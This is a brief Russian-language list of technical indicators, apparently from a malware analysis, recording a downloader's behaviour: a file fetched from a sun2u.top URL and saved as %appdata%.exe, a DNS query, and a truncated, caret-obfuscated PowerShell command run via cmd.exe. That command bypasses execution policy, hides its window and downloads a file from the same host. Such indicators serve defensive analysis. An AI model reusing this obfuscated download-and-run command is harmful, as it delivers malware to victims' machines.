Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWE^RShElL^.E^Xe ^-EXECUTi^On^pOL^ic^Y^ b^ypaSS^ ^-N^O^prOF^il^e ^-w^INDOWSTyL^e ^h^iDdeN^ (NeW-OBJ^Ect^ SYs^tE^M.N^E^T.^w^eb^c^l^iE^Nt).D^O^W^nl^O^a^d^FIle('http://sun2u.top/s...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /c "POWE^RShElL^.E^Xe ^-EXECUTi^On^pOL^ic^Y^ b^ypaSS^ ^-N^O^prOF^il^e ^-w^INDOWSTyL^e ^h^iDdeN^ (NeW-OBJ^Ect^ SYs^tE^M.N^E^T.^w^eb^c^l^iE^Nt).D^O^W^nl^O^a^d^FIle('http://sun2u.top/s...' (со скрытым окном)